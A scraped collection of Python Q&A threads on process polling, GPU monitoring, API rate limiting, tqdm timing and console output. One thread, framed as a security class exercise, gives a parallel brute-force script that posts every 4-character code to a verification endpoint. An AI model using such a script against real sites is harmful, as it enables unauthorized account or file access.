Check every X-milliseconds if process/application is running on Win - python

i want to check every 500 milliseconds if a process/application is running (Windows 10). The code should be very fast and resource efficient!
My Code is this but how to build the 500 milliseconds in. Is psutil the fastest and best way? Thank You.
import psutil
for p in psutil.process_iter(attrs=['pid', 'name']):
if "excel.exe" in (p.info['name']).lower():
print("Application is running", (p.info['name']).lower())
else:
print("Application is not Running")

How about doing it like this:
import psutil
import time
def running(pname):
pname = pname.lower()
for p in psutil.process_iter(attrs=['name']):
if pname in p.info['name'].lower():
print(f'{pname} is running')
return # early return
print(f'{pname} is not running')
while True:
running('excel.exe')
time.sleep(0.5)

First of all, psutil is a pretty good library. It has C Bindings so you won't be able to get much faster.
import psutil
import time
def print_app():
present = False
for p in psutil.process_iter(attrs=['pid', 'name']):
if "excel.exe" in (p.info['name']).lower():
present = True
print(f"Application is {'' if present else 'not'} present")
start_time = time.time()
print_app()
print("--- %s seconds ---" % (time.time() - start_time))
You can know how much time it takes. 0.06sec for me.
if you want to exec this every 0.5s you can simply put a time.sleep because 0.5 >> 0.06.
You can then write this kind of code:
import psutil
import time
def print_app():
present = False
for p in psutil.process_iter(attrs=['pid', 'name']):
if "excel.exe" in (p.info['name']).lower():
present = True
print(f"Application is {'' if present else 'not'} present")
while True:
print_app()
sleep(0.5)
PS: I changed your code to check if your app was running without printing it. This makes the code faster because print takes a bit of time.

Related

How to get every second's GPU usage in Python

I have a model which runs by tensorflow-gpu and my device is nvidia. And I want to list every second's GPU usage so that I can measure average/max GPU usage. I can do this mannually by open two terminals, one is to run model and another is to measure by nvidia-smi -l 1. Of course, this is not a good way. I also tried to use a Thread to do that, here it is.
import subprocess as sp
import os
from threading import Thread
class MyThread(Thread):
def __init__(self, func, args):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
return self.result
def get_gpu_memory():
output_to_list = lambda x: x.decode('ascii').split('\n')[:-1]
ACCEPTABLE_AVAILABLE_MEMORY = 1024
COMMAND = "nvidia-smi -l 1 --query-gpu=memory.used --format=csv"
memory_use_info = output_to_list(sp.check_output(COMMAND.split()))[1:]
memory_use_values = [int(x.split()[0]) for i, x in enumerate(memory_use_info)]
return memory_use_values
def run():
pass
t1 = MyThread(run, args=())
t2 = MyThread(get_gpu_memory, args=())
t1.start()
t2.start()
t1.join()
t2.join()
res1 = t2.get_result()
However, this does not return every second's usage as well. Is there a good solution?
In the command nvidia-smi -l 1 --query-gpu=memory.used --format=csv
the -l stands for:
-l, --loop= Probe until Ctrl+C at specified second interval.
So the command:
COMMAND = 'nvidia-smi -l 1 --query-gpu=memory.used --format=csv'
sp.check_output(COMMAND.split())
will never terminate and return.
It works if you remove the event loop from the command(nvidia-smi) to python.
Here is the code:
import subprocess as sp
import os
from threading import Thread , Timer
import sched, time
def get_gpu_memory():
output_to_list = lambda x: x.decode('ascii').split('\n')[:-1]
ACCEPTABLE_AVAILABLE_MEMORY = 1024
COMMAND = "nvidia-smi --query-gpu=memory.used --format=csv"
try:
memory_use_info = output_to_list(sp.check_output(COMMAND.split(),stderr=sp.STDOUT))[1:]
except sp.CalledProcessError as e:
raise RuntimeError("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
memory_use_values = [int(x.split()[0]) for i, x in enumerate(memory_use_info)]
# print(memory_use_values)
return memory_use_values
def print_gpu_memory_every_5secs():
"""
This function calls itself every 5 secs and print the gpu_memory.
"""
Timer(5.0, print_gpu_memory_every_5secs).start()
print(get_gpu_memory())
print_gpu_memory_every_5secs()
"""
Do stuff.
"""
Here is a more rudimentary way of getting this output, however just as effective - and I think easier to understand. I added a small 10-value cache to get a good recent average and upped the check time to every second. It outputs average of the last 10 seconds and the current each second, so operations that cause usage can be identified (what I think the original question was).
import subprocess as sp
import time
memory_total=8192 #found with this command: nvidia-smi --query-gpu=memory.total --format=csv
memory_used_command = "nvidia-smi --query-gpu=memory.used --format=csv"
isolate_memory_value = lambda x: "".join(y for y in x.decode('ascii') if y in "0123456789")
def main():
percentage_cache = []
while True:
memory_used = isolate_memory_value(sp.check_output(memory_used_command.split(), stderr=sp.STDOUT))
percentage = float(memory_used)/float(memory_total)*100
percentage_cache.append(percentage)
percentage_cache = percentage_cache[max(0, len(percentage_cache) - 10):]
print("curr: " + str(percentage) + " %", "\navg: " + str(sum(percentage_cache)/len(percentage_cache))[:4] + " %\n")
time.sleep(1)
main()

Trying to add throttle control to paralleled API calls in python

I am using Google places API which has a query per second limit of 10. This means I cannot make more than 10 requests within a second. If we were using Serial execution this wouldn't be an issue as the APIs avg response time is 250 ms, so i will be able to make just 4 calls in a second.
To utilize the entire 10 QPS limit i used multithreading and made parallel API calls. But now i need to control the number of calls that can happen in a second, it should not go beyond 10 (google API starts throwing errors if i cross the limit)
Below is the code that i have so far, I am not able to figure out why the program just gets stuck sometimes or takes alot longer than required.
import time
from datetime import datetime
import random
from threading import Lock
from concurrent.futures import ThreadPoolExecutor as pool
import concurrent.futures
import requests
import matplotlib.pyplot as plt
from statistics import mean
from ratelimiter import RateLimiter
def make_parallel(func, qps=10):
lock = Lock()
threads_execution_que = []
limit_hit = False
def qps_manager(arg):
current_second = time.time()
lock.acquire()
if len(threads_execution_que) >= qps or limit_hit:
limit_hit = True
if current_second - threads_execution_que[0] <= 1:
time.sleep(current_second - threads_execution_que[0])
current_time = time.time()
threads_execution_que.append(current_time)
lock.release()
res = func(arg)
lock.acquire()
threads_execution_que.remove(current_time)
lock.release()
return res
def wrapper(iterable, number_of_workers=12):
result = []
with pool(max_workers=number_of_workers) as executer:
bag = {executer.submit(func, i): i for i in iterable}
for future in concurrent.futures.as_completed(bag):
result.append(future.result())
return result
return wrapper
#make_parallel
def api_call(i):
min_func_time = random.uniform(.25, .3)
start_time = time.time()
try:
response = requests.get('https://jsonplaceholder.typicode.com/posts', timeout=1)
except Exception as e:
response = e
if (time.time() - start_time) - min_func_time < 0:
time.sleep(min_func_time - (time.time() - start_time))
return response
api_call([1]*50)
Ideally the code should take not more than 1.5 seconds, but currently it is taking about 12-14 seconds.
The script speeds up to its expected speed as soon as i remove the QPS manager logic.
Please do suggest what i am doing wrong and also, if there is any package available already which does this mechanism out of the box.
Looks like ratelimit does just that:
from ratelimit import limits, sleep_and_retry
#make_parallel
#sleep_and_retry
#limits(calls=10, period=1)
def api_call(i):
try:
response = requests.get("https://jsonplaceholder.typicode.com/posts", timeout=1)
except Exception as e:
response = e
return response
EDIT: I did some testing and it looks like #sleep_and_retry is a little too optimistic, so just increase the period a little, to 1.2 second:
s = datetime.now()
api_call([1] * 50)
elapsed_time = datetime.now() - s
print(elapsed_time > timedelta(seconds=50 / 10))

tqdm: extract time passed + time remaining?

I have been going over the tqdm docs, but no matter where I look, I cannot find a method by which to extract the time passed and estimated time remaining fields (basically the center of the progress bar on each line: 00:00<00:02).
0%| | 0/200 [00:00<?, ?it/s]
4%|▎ | 7/200 [00:00<00:02, 68.64it/s]
8%|▊ | 16/200 [00:00<00:02, 72.87it/s]
12%|█▎ | 25/200 [00:00<00:02, 77.15it/s]
17%|█▋ | 34/200 [00:00<00:02, 79.79it/s]
22%|██▏ | 43/200 [00:00<00:01, 79.91it/s]
26%|██▌ | 52/200 [00:00<00:01, 80.23it/s]
30%|███ | 61/200 [00:00<00:01, 82.13it/s]
....
100%|██████████| 200/200 [00:02<00:00, 81.22it/s]
tqdm works via essentially printing a dynamic progress bar anytime an update occurs, but is there a way to "just" print the 00:01 and 00:02 portions, so I could use them elsewhere in my Python program, such as in automatic stopping code that halts the process if it is taking too long?
tqdm objects expose some information via the public property format_dict.
from tqdm import tqdm
# for i in tqdm(iterable):
with tqdm(iterable) as t:
for i in t:
...
elapsed = t.format_dict['elapsed']
elapsed_str = t.format_interval(elapsed)
Otherwise you could parse str(t).split()
You can get elapsed and remaining time from format_dict and some calculations.
t = tqdm(total=100)
...
elapsed = t.format_dict["elapsed"]
rate = t.format_dict["rate"]
remaining = (t.total - t.n) / rate if rate and t.total else 0 # Seconds*
Here's the answer to the time remaining and time elapsed question:
from tqdm import tqdm
from time import sleep
with tqdm(total=100, bar_format="{l_bar}{bar} [ time left: {remaining}, time spent: {elapsed}]") as pbar:
for i in loop:
pbar.update(1)
sleep(0.01)
If needed to be worked with or printed elsewhere:
elapsed = pbar.format_dict["elapsed"]
remains = pbar.format_dict["remaining"]
Edit: see the library maintainer's answer below. Turns out, it is possible to get this information in the public API.
tqdm does not expose that information as part of its public API, and I don't recommend trying to hack your own into it. Then you would be depending on implementation details of tqdm that might change at any time.
However, that shouldn't stop you from writing your own. It's easy enough to instrument a loop with a timer, and you can then abort the loop if it takes too long. Here's a quick, rough example that still uses tqdm to provide visual feedback:
import time
from tqdm import tqdm
def long_running_function(n, timeout=5):
start_time = time.time()
for _ in tqdm(list(range(n))):
time.sleep(1) # doing some expensive work...
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise TimeoutError("long_running_function took too long!")
long_running_function(100, timeout=10)
If you run this, the function will stop its own execution after 10 seconds by raising an exception. You could catch this exception at the call site and respond to it in whatever way you deem appropriate.
If you want to be clever, you could even factor this out in a tqdm-like wrapper like this:
def timed_loop(iterator, timeout):
start_time = time.time()
iterator = iter(iterator)
while True:
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise TimeoutError("long_running_function took too long!")
try:
yield next(iterator)
except StopIteration:
pass
def long_running_function(n, timeout=5):
for _ in timed_loop(tqdm(list(range(n))), timeout=timeout):
time.sleep(0.1)
long_running_function(100, timeout=5)

Slow brute force program in python

So here's the problem, our security teacher made a site that requires authentification and then asks for a code (4 characters) so that you can access to a file. He told us to write a brute force program in Python (any library we want) that can find the password. So to do that I wanted first to make a program that can try random combinations on that code field just to have an idea about the time of each request ( I'm using requests library) and the result was disapointing each request takes around 8 secs.
With some calculations: 4^36=13 436 928 possible combination that would take my program around 155.52 days.
I would really apreciate if any one can help me out to make that faster. ( he told us that it is possible to make around 1200 combinations per sec)
Here's my code:
import requests
import time
import random
def gen():
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
pw_length = 4
mypw = ""
for i in range(pw_length):
next_index = random.randrange(len(alphabet))
mypw = mypw + alphabet[next_index]
return mypw
t0 = time.clock()
t1 = time.time()
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
for i in range(0,5):
t2 = time.clock()
t3 = time.time()
values = {'RECALL':gen()}
r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
print("##################################")
print("cpu time for req ",i,":", time.clock()-t2)
print("wall time for req ",i,":", time.time()-t3)
print("##################################")
print("##################################")
print("Total cpu time:", time.clock()-t0)
print("Total wall time:", time.time()-t1)
Thank you
A thing you could try is to use a Pool of workers to do multiple requests in parallel passing a password to each worker. Something like:
import itertools
from multiprocessing import Pool
def pass_generator():
for pass_tuple in itertools.product(alphabet, repeat=4):
yield ''.join(pass_tuple)
def check_password(password):
values = {'RECALL': password}
r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
# Check response here.
pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(check_password, pass_generator())

How can I clear a line in console after using \r and printing some text?

For my current project, there are some pieces of code that are slow and which I can't make faster. To get some feedback how much was done / has to be done, I've created a progress snippet which you can see below.
When you look at the last line
sys.stdout.write("\r100%" + " "*80 + "\n")
I use " "*80 to override eventually remaining characters. Is there a better way to clear the line?
(If you find the error in the calculation of the remaining time, I'd also be happy. But that's the question.)
Progress snippet
#!/usr/bin/env python
import time
import sys
import datetime
def some_slow_function():
start_time = time.time()
totalwork = 100
for i in range(totalwork):
# The slow part
time.sleep(0.05)
if i > 0:
# Show how much work was done / how much work is remaining
percentage_done = float(i)/totalwork
current_running_time = time.time() - start_time
remaining_seconds = current_running_time / percentage_done
tmp = datetime.timedelta(seconds=remaining_seconds)
sys.stdout.write("\r%0.2f%% (%s remaining) " %
(percentage_done*100, str(tmp)))
sys.stdout.flush()
sys.stdout.write("\r100%" + " "*80 + "\n")
sys.stdout.flush()
if __name__ == '__main__':
some_slow_function()
Consoles
I use ZSH most of the time, sometimes bash (and I am always on a Linux system)
Try using the ANSI/vt100 "erase to end of line" escape sequence:
sys.stdout.write("\r100%\033[K\n")
Demonstration:
for i in range(4):
sys.stdout.write("\r" + ("."*i*10))
sys.stdout.flush()
if i == 3:
sys.stdout.write("\rDone\033[K\n")
time.sleep(1.5)
Reference: https://en.wikipedia.org/wiki/ANSI_escape_code#CSI_sequences
This is what I use
from msvcrt import putch, getch
def putvalue(value):
for c in str(value):
putch(c)
def overwrite(value):
""" Used to overwrite the current line in the command prompt,
useful when displaying percent or progress """
putvalue('\r'+str(value))
from time import sleep
for x in xrange(101):
overwrite("Testing Overwrite.........%s%% complete" % x)
sleep(.05)

Categories

Resources